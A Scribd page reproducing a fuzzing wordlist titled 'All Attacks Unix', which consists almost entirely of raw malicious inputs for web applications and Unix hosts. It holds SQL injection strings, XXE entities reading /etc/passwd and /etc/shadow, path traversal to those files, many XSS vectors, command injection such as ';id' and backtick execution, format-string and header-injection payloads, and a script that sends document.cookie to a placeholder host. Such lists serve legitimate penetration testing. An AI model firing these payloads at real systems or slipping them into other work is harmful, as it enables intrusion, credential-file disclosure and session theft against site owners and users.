Thanks to visit codestin.com
Credit goes to www.scribd.com

0% found this document useful (0 votes)
14 views10 pages

All Attacks Unix

The document contains a wide range of malicious input examples targeting Unix-like systems, including various SQL injection, XML external entity (XXE) attacks, and cross-site scripting (XSS) payloads. These inputs are designed to exploit vulnerabilities in web applications and systems by manipulating input fields or executing commands. The document serves as a reference for understanding potential attack vectors and testing security measures.

Uploaded by

cnmsbguge2021
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
14 views10 pages

All Attacks Unix

The document contains a wide range of malicious input examples targeting Unix-like systems, including various SQL injection, XML external entity (XXE) attacks, and cross-site scripting (XSS) payloads. These inputs are designed to exploit vulnerabilities in web applications and systems by manipulating input fields or executing commands. The document serves as a reference for understanding potential attack vectors and testing security measures.

Uploaded by

cnmsbguge2021
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 10

# a wide sample of malicious input for unix-like targets

!
!'
!@#$%%^#$%#$@#$%$$@#$%^^**(()
!@#0%^#0##018387@#0^^**(()
"
" or "a"="a
" or "x"="x
" or 0=0 #
" or 0=0 --
" or 1=1 or ""="
" or 1=1--
"' or 1 --'"
") or ("a"="a
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!
ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!
ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or
''=']]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<!
[CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
"<HTML xmlns:xss><?import namespace=""xss""
implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!--
-->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B""
DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"><script>"
"><script>alert(1)</script>
"><script>document.location='http://your.site.com/cgi-bin/
cookie.cgi?'+document.cookie</script>
">xxx<P>yyy
"\t"
#
#&apos;
#'
#xA
#xA#xD
#xD
#xD#xA
$NULL
$null
%
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
%00/
%00/etc/passwd%00
%01%02%03%04%0a%0d%0aADSF
%08x
%0A/usr/bin/id
%0A/usr/bin/id%0A
%0Aid
%0Aid%0A
%0a ping -i 30 127.0.0.1 %0a
%oa ping -n 30 127.0.0.1 %0a
%0a id %0a
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:
+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
%0d
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>
%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo
%0d%0a%2e%0d%0a
%0d%0aX-Injection-Header:%20AttackValue
%20
%20$(sleep%2050)
%20'sleep%2050'
%20d
%20n
%20s
%20x
%20|
%21
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi
%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..
%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..
%25%5c..%25%5c..% 25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..
%25%5c..%25%5c..%25%5c..%25%5c..%00
%2500
%250a
%26
%27%20or%201=1
%28
%29
%2A
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%2C
%2e%2e%2f
%3C
%3C%3F
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
%3cscript%3ealert("XSS");%3c/script%3e
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%5C
%5C/
%60
%7C
%7f
%99999999999s
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
%A%A%A%A%A%A%A%A%A%A%A%A%A
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
%E%E%E%E%E%E%E%E%E%E%E%E%E
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
%F%F%F%F%F%F%F%F%F%F%F%F%F
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
%G%G%G%G%G%G%G%G%G%G%G%G%G
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
%X%X%X%X%X%X%X%X%X%X%X%X%X
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
%a%a%a%a%a%a%a%a%a%a%a%a%a
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
%d%d%d%d%d%d%d%d%d%d%d%d%d
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
%e%e%e%e%e%e%e%e%e%e%e%e%e
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
%f%f%f%f%f%f%f%f%f%f%f%f%f
%ff
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
%g%g%g%g%g%g%g%g%g%g%g%g%g
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
%i%i%i%i%i%i%i%i%i%i%i%i%i
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
%o%o%o%o%o%o%o%o%o%o%o%o%o
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
%p%p%p%p%p%p%p%p%p%p%p%p%p
%s%p%x%d
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s%s%s
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
%u%u%u%u%u%u%u%u%u%u%u%u%u
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x%x%x%x%x%x%x%x%x%x
&
& id
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
&#0000060
&#0000060;
&#000060
&#000060;
&#00060
&#00060;
&#0060
&#0060;
&#060
&#060;
&#10;
&#10;&#13;
&#13;
&#13;&#10;
&#60
&#60;
&#X000003C
&#X000003C;
&#X000003c
&#X000003c;
&#X00003C
&#X00003C;
&#X00003c
&#X00003c;
&#X0003C
&#X0003C;
&#X0003c
&#X0003c;
&#X003C
&#X003C;
&#X003c
&#X003c;
&#X03C
&#X03C;
&#X03c
&#X03c;
&#X3C
&#X3C;
&#X3c
&#X3c;
&#x000003C
&#x000003C;
&#x000003c
&#x000003c;
&#x00003C
&#x00003C;
&#x00003c
&#x00003c;
&#x0003C
&#x0003C;
&#x0003c
&#x0003c;
&#x003C
&#x003C;
&#x003c
&#x003c;
&#x03C
&#x03C;
&#x03c
&#x03c;
&#x3C
&#x3C;
&#x3c
&#x3c;
&LT
&LT;
&apos;
&apos;%20OR
&id
&lt
&lt;
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
&lt;&gt;&quot;'%;)(&amp;+
&ltscript&gtalert(document.cookie);&ltscript&gtalert
&ltscript&gtalert(document.cookie);</script>
&quot;;id&quot;
'
' (select top 1
' --
' ;
' UNION ALL SELECT
' UNION SELECT
' or ''='
' or '1'='1
' or '1'='1'--
' or 'x'='x
' or (EXISTS)
' or 0=0 #
' or 0=0 --
' or 1 in (@@version)--
' or 1=1 or ''='
' or 1=1--
' or a=a--
' or uid like '%
' or uname like '%
' or user like '%
' or userid like '%
' or username like '%
'%20or%201=1
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
'';!--"<XSS>=&{()}
') or ('a'='a
'--
'; exec master..xp_cmdshell
'; exec xp_regread
'; waitfor delay '0:30:0'--
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></
SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
';shutdown--
'><script>alert(document.cookie);</script>
'><script>alert(document.cookie)</script>
'hi' or 'x'='x';
'or select *
'sqlattempt1
'||UTL_HTTP.REQUEST
'||Utl_Http.request('http://<yourservername>') from dual--
(
(')
(sqlattempt2)
)
))))))))))
*
*&apos;
*'
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
+
+%00
,@variable
-
--
--';
--sp_password
-1
-1.0
-2
-20
-268435455
..%%35%63
..%%35c
..%25%35%63
..%255c
..%5c
..%bg%qf
..%c0%af
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
..%u2215
..%u2216
../
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/shadow%00
..\
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
/
/%00/
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..
%25%5c..%25%5c..%25%5c..%25%5c..%00
/%2A
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
/&apos;
/'
/,%ENV,/
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/.../.../.../.../.../
/../../../../../../../../%2A
/../../../../../../../../../../../etc/passwd%00.html
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../bin/id|
/..\../..\../..\../..\../..\../..\../boot.ini
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
//
//*
/etc/passwd
/etc/shadow
/index.html|id|
0
0 or 1=1
00
0xfffffff
1
1 or 1 in (@@version)--
1 or 1=1--
1.0
1; waitfor delay '0:30:0'--
1;SELECT%20*
1||Utl_Http.request('http://<yourservername>') from dual--
2
2147483647
268435455
65536
:response.write 111111
;
; ping 127.0.0.1 ;
;/usr/bin/id\n
;echo 111111
;id
;id;
;id\n
;id|
;ls -la
;system('/usr/bin/id')
;system('cat%20/etc/passwd')
;system('id')
;|/usr/bin/id|
<
< script > < / script>
<!
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
</foo>
<<
<<<
<<script>alert("XSS");//<</script>
<>"'%;)(&+
<?
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!
ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!
ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!
ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!
ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<!
[CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<HTML xmlns:xss><?import namespace="xss"
implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC=" &#14; javascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<IMG SRC="javascript:alert('XSS');">
<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#00001
12&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039
&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG
SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;
&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x7
4&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=`javascript:alert("'XSS'")`>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.
%26%23x63;ookie)'>
<IMG%20SRC='javasc ript:alert(document.cookie)'>
<IMG%20SRC='javascript:alert(document.cookie)'>
<foo></foo>
<name>','')); phpinfo(); exit;/*</name>
<script>alert("XSS")</script>
<script>alert(document.cookie)</script>
<xml ID="xss"><I><B>&lt;IMG SRC="javas<!--
-->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B"
DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>
<xss><script>alert('XSS')</script></vulnerable>
<youremail>%0aBcc:<youremail>
<youremail>%0aCc:<youremail>
<youremail>%0d%0aBcc:<youremail>
<youremail>%0d%0aCc:<youremail>
=
='
=--
=;
>
?x=
?x="
?x=>
?x=|
@&apos;
@'
@*
@variable
A
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
FALSE
NULL
PRINT
PRINT @@variable
TRUE
XXXXX.%p
XXXXX`perl -e 'print ".%p" x 80'`
[&apos;]
[']
\
\";alert('XSS');//
\"blah
\&apos;
\'
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
\0
\00
\00\00
\00\00\00
\0\0
\0\0\0
\\
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
\\/
\\\\*
\\\\?\\
\n/bin/ls -al\n
\n/usr/bin/id;
\n/usr/bin/id\n
\n/usr/bin/id|
\nid;
\nid\n
\nid|
\nnetstat -a%\n
\t
\u003C
\u003c
\x23
\x27
\x27UNION SELECT
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
\x3C
\x3D \x27
\x3D \x3B'
\x3c
^&apos;
^'
`
`/usr/bin/id`
`dir`
`id`
`perl -e 'print ".%p" x 80'`%n
`ping 127.0.0.1`
a);/usr/bin/id
a);/usr/bin/id;
a);/usr/bin/id|
a);id
a);id;
a);id|
a)|/usr/bin/id
a)|/usr/bin/id;
a)|id
a)|id;
a;/usr/bin/id
a;/usr/bin/id;
a;/usr/bin/id|
a;id
a;id;
a;id|
http://<yourservername>/
id%00
id%00|
insert
like
limit
null
or
or 0=0 #
or 0=0 --
or 1=1--
or%201=1
or%201=1 --
response.write 111111
something%00html
update
x' or 1=1 or 'x'='y
x' or name()='username' or 'x'='y
xsstest
xsstest%00"<>'
{&apos;}
|/usr/bin/id
|/usr/bin/id|
|id
|id;
|id|
|ls
|ls -la
|nid\n
|usr/bin/id\n
||
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
||/usr/bin/id;
||/usr/bin/id|
}

You might also like